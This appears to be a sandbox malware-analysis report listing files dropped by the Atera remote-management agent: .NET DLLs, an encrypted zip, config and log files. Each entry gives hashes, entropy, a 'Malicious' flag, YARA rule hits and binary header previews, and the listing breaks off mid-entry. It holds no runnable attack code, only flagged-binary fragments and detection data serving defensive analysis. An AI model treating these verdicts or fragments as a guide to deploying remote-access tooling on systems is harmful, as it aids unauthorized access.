                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284208
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.11766612253341
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:IZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHex:Ogo0WPVTXgk
                                                                                                                                                                                                                                                                                              MD5:D1BA01295CAEFA1F00261AAA943FFDBC
                                                                                                                                                                                                                                                                                              SHA1:54BE9D6F121721542E1B563804766592C9EBF14E
                                                                                                                                                                                                                                                                                              SHA-256:F425945B4D1BD5D65776EE4FF4330F33947692EA5E797EDA3103B6E380196BAF
                                                                                                                                                                                                                                                                                              SHA-512:DFFE1F15F635FD9C083B51C66DBE5C5C9B16516B8CA036B262765279FBF01FC521D10AE31288CA3FB5DAD4F8B6E744DDA33FB8698267C40970DCA9409178E067
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22064
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.678784612747097
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqpx:tuhMaVmzDC67EpYinAMxCJ
                                                                                                                                                                                                                                                                                              MD5:35082EAB5825C9A9D021B5B97BE382B2
                                                                                                                                                                                                                                                                                              SHA1:4716CBD843C8A2A1AA7ED7C95700672E9A863674
                                                                                                                                                                                                                                                                                              SHA-256:B91E3FA4C89230B668EE2DE7D6824DAB708B981F1AE94E734445154BC8A3F6EC
                                                                                                                                                                                                                                                                                              SHA-512:9F0FFB52E060910662AE7AA020AE836119BC609B3E0E9367C7C9D2F2975FC1DDEB1EC1B2F708704C22D666E778B787679BEE5A3CAB5868C09CCB5B57C9026BA2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):97328
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2419469146373485
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:3NSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxQ:3N3OWMsQ56vd2s+KuYc9RTJa
                                                                                                                                                                                                                                                                                              MD5:9F59EFE4EE7BFF13F5866311048A6A80
                                                                                                                                                                                                                                                                                              SHA1:1F20929EE2BCC0BE40848CC739C6F31CAD13DA69
                                                                                                                                                                                                                                                                                              SHA-256:32FB947BAD722480938922DC363DB76AB0079383C6D732B4998C302B03D87200
                                                                                                                                                                                                                                                                                              SHA-512:CCCAAF2396AD1307AF0B51B424005BFB350508059CD9CF3E9641D396CCA3EC4C22EFB0329DF0AFD0B3888E07559B6904A0361B85A80A527CD3139161CFF91DAA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0............" ..0..J...........h... ........... ..............................P.....`..................................g..O....................T..0(...........f..T............................................ ............... ..H............text...4I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......L...............<^.. ...\f........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138288
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.17954530016547
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:G3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnO:U0qjCSRE+fw0kG719
                                                                                                                                                                                                                                                                                              MD5:6D055BBD0463057997B216FA41FC1BAA
                                                                                                                                                                                                                                                                                              SHA1:0E3B5685453BFE674252EEFE7B29DDFFE3394F36
                                                                                                                                                                                                                                                                                              SHA-256:94571C1156471E113A0BA58686D0E0F8C8A18B7F5415A17CC00688D6901D6DD6
                                                                                                                                                                                                                                                                                              SHA-512:D3D1FB3588D4AE7279244086069DEF2145FDD341099BD66B801CE1F7EB18F4F68B0043D3CF4BA5C8FA3FA680EF228C3371743AF1E9DCAA64711321EC6A94FCEC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`......\.....@.................................?...O.... ..@...............0(...@..........8............................................ ............... ..H............text...h.... ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B................s.......H........ ..............\.......D.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17968
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.673983708245621
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Oh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBhKr+:Oy9eEpYinAMxCAcr+
                                                                                                                                                                                                                                                                                              MD5:351EE6E0FBE6951D43F195DBFD34911A
                                                                                                                                                                                                                                                                                              SHA1:2FAAD5BD1D08D9791C941F6F01BA41473C12DD1F
                                                                                                                                                                                                                                                                                              SHA-256:8B4AF4380F5083A9DC11F5E74FEA942A34DE4AA3740EE0DBCEF92A95AFD656F6
                                                                                                                                                                                                                                                                                              SHA-512:00A0600E0E4541058B8FF5A7314E0C2779B5BA5E3F9FBE9F15556E84D84D8B3C0317116B29A832CB038457EF6CE1FA88149C18E7DD33D27A3ADD3AFFAC5FF9D7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):342316
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999331258360695
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:6144:Ir6VUI82xfkgpWrvL/JVW2L3ukK29GSya5GZ7F2vtVygTNBr6VEZGqTkxU4sAQgY:Ir6+jAfk/rD/J3Lun8EaekVcgTzr6GZR
                                                                                                                                                                                                                                                                                              MD5:09447F135F7F4486C165061CF443C569
                                                                                                                                                                                                                                                                                              SHA1:3AD4264DB3112F845D35C112AABEA9CBB2E21AFA
                                                                                                                                                                                                                                                                                              SHA-256:0142E2CA4F93C9631591065DC53944A86E4B961620F4FAF1FE8B61A8B2867C9B
                                                                                                                                                                                                                                                                                              SHA-512:BE678FB5CA389198A5CC474C8E9E9D0C79A92A582CB81325B13D8BE226725AD04FAA6ECC3B4B7CECAEDAA6F15EC13F01C0276100EE19FAAF0A1B1DD7D061F31B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....#D.Y.V.:........-...AgentPackageSTRemote/AgentPackageSTRemote.exe....(........m......~.;8w.8...N.....]..z..1.o.?.............b...T..*.....W......v....,.3.<~.@.U...F]....oCo..a..dR......Q.+.Q+.#B..7.\.@.>o.;..J7wd........H...m.G/.^Y..2..u.._.b.0.%T.U....,^........W.....MS.+...;..N..63d..m.0w._`V.J.t..g.x....?f=...81}j.SS.....*.z..M. ......=Y].yD.<..S..,.{..x&@g.&.}...A...y..<z`.Z.a.>H.......wo.k..]9.9..-.YvL..FhQ..P]..1.+~d.....'9...4O?.$h.....2.`..G....2T<..(.t..q.W#..]C.6/a...o....Q......c...X.....]q..U.%.....8...~..k....~.b...c3ob(G.&.S..8g.x.vO.Cz.yk.p5....i..-=.p...=^...wg.....N...R...TL..... ..uP...Q...... ..5....u..Ydn...RW..w.;).n.v.......WA.Q.........2....,Z....T..P..."....[h......~}..N.k...].6..M..|.......To.......'..Q...&.y.........v...OK8.e^..%>.e..B1:7.#..(..........;...79|.....n..u.,..[....#Q..........{...T...i..H....1.8.....S..|__....^Cu...*....M..T....r..._G,....H....T=..?3.X..{.5..".0(6...\V...p!..1..S...d

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):72744
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.510938920637226
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:r8V3tfciq9s2k7Xvpci+yLYCJoUu7Q6P+O76q:klPna02B86P+ON
                                                                                                                                                                                                                                                                                              MD5:67FEF41237025021CD4F792E8C24E95A
                                                                                                                                                                                                                                                                                              SHA1:C47A5A33F182C8244798819E2DC5A908D51703E8
                                                                                                                                                                                                                                                                                              SHA-256:C936879FBB1AA6D51FE1CDC0E351F933F835C0BF0E30AEF99A4E19A07A920029
                                                                                                                                                                                                                                                                                              SHA-512:232015FE6BEE6637D915648A256474FC3DF79415AC90BABDFC2E3DED06C2F36FCE85573EC7670F2A05126AA5F24A570B36885E386061666D9EAA1F0DA67A093E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B.Pg.........."...0.................. ... ....@.. .......................`............`.....................................O.... ..P...............((...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H........B...............................................................0..........(....9....(....~<...%-.&~;.....t...s....%.<...(...+~=...%-.&~;.....u...s....%.=...(...+~>...%-.&~;.....v...s....%.>...(...+~?...%-.&~;.....w...s....%.?...(...+*.*..(....*...0..-.......(.....3..*r...pr...p(....,.(......(....+..._*....0..(........(......~....(....,..*..(....~....(....*.0.......... ....(......i./.*...............&.........4...%.. ..o.......r9..p( ...,.*......s!.....s!............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):541
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                              MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                                                                              SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                                                                              SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                                                                              SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXRLW:WBRi
                                                                                                                                                                                                                                                                                              MD5:B22628235C1F44AE054091C8FDC82D23
                                                                                                                                                                                                                                                                                              SHA1:70C8E5ABD9D2D8A18B769F6E71819FB53B273B9B
                                                                                                                                                                                                                                                                                              SHA-256:B31673E38897D5D84558E2745D02C553649A50063A9F0E7DE7E71BBA89916232
                                                                                                                                                                                                                                                                                              SHA-512:C1097690938F3EDCBA20802DFB77880FB29D1F8B70C62FA76D1828613D57355FD04C0B3D26DA90128DB2DF2E63E4E30C8E195B84452C0931B8CB2F043D5BBA98
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=24.3

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96808
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.179705686579105
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:FJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762s:FQUm2H5KTfOLgxFJjE50vksVUfPvO1m
                                                                                                                                                                                                                                                                                              MD5:C548EA0CD65F5981C2DF82A0177A9D3A
                                                                                                                                                                                                                                                                                              SHA1:5D082BC6BC2D1F2267AE8525F3A528A0B58C3161
                                                                                                                                                                                                                                                                                              SHA-256:BEAFAA0CF51CE914B58482094044A6CC742C3269431A812D5683CA3034ACCD84
                                                                                                                                                                                                                                                                                              SHA-512:530AE2069185897612E0129135065954379F75F6C9F9DAEE3F7D9DFE49C7CEAFC8807DC866591F39337410FAFA76733705C316912F3A12AE85565ECB775476F4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................;.....`.................................(f..O.......8............R..((...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960555604702895
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:UBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTU4:UBjk38WuBcAbwoA/BkjSHXP36RMGN
                                                                                                                                                                                                                                                                                              MD5:1792F462B4908235FBA6B3B4B2203276
                                                                                                                                                                                                                                                                                              SHA1:E1B0CF8559C330377E2DE7FEE9FCC0FC3D34566A
                                                                                                                                                                                                                                                                                              SHA-256:8CA1C3651A6F118C80E712BCB9C44031EB3D8C7180A60EDA5F2B24A0584082A9
                                                                                                                                                                                                                                                                                              SHA-512:7AB9E256A4359A5560BD8C10014591F350F2788F72693234C16AA0B75F95F9EE3CF5E219B97A33944A5E730202BD355064885FD060812EE150107FFC84C92F65
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\attendance-updated-time.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.858278308418045
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WaUQSSOQ:WfH+
                                                                                                                                                                                                                                                                                              MD5:461B4F4FB8C02E277016F6A8EFC9B02C
                                                                                                                                                                                                                                                                                              SHA1:6474936F26D1171B8743B211B3661A9DF99B52CA
                                                                                                                                                                                                                                                                                              SHA-256:62B42F7ECDACFD9A71E1B73B6F7A70B8C1FB47D54C859BAE9E3168EECA6FF9ED
                                                                                                                                                                                                                                                                                              SHA-512:8F3819D6A675AC3237A0CB6D0B9B37E73ADC076A8CD125495E7C8B6B56506FF5ACE06B5F05968F6F08A523D4984A022F5D67B955724738B5AF4F5B86917C33E4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:638717435157779332

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\lh.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.037452826908326
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YhKSLJf2B4VXdly08HvI63JNFH6qJYCnf2RO0Yj:Y5fVX8HvI2rH6qmCeoF
                                                                                                                                                                                                                                                                                              MD5:4EBE17902365F2BBD25015948F754237
                                                                                                                                                                                                                                                                                              SHA1:99ED8AAA20219CB2C5436EFB7075738DE59D5DFD
                                                                                                                                                                                                                                                                                              SHA-256:F867FCAC0316E5C81E66C62C9EAE25BEF5F2C39F70BD244EFF724CE1196E66EC
                                                                                                                                                                                                                                                                                              SHA-512:0A457D4CFFD4BDA81F0B21524E8BD345915B6BE8B3DA915C3C29E7F6536184DBB4340C404C908490F9569C81C0A63484E75C951C87CF4F1728866580BE1A5447
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{"DownloadedAt":"2025-01-08T10:30:00.7091879-05:00","Hash":"nNa6OtJ9rJZ/Bzy8rYj++Q=="}

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\log.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1560
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.061010581469363
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:5Q0/bqd+sVNPwliQ0/bqd+sVNPwyQ0/bqd+sVNPwkEK:OUbgd50Ubgd5cUbgd5N9
                                                                                                                                                                                                                                                                                              MD5:FE5DD84A714EF3BEBBC96647CD7B1FAA
                                                                                                                                                                                                                                                                                              SHA1:C2AD9F433DC542305121C356591B8CED5EE57358
                                                                                                                                                                                                                                                                                              SHA-256:B4B6C63CBE233DBB78380A4DFBFF5BE732F5E5762878EBEA3A1CA8155D7D23A6
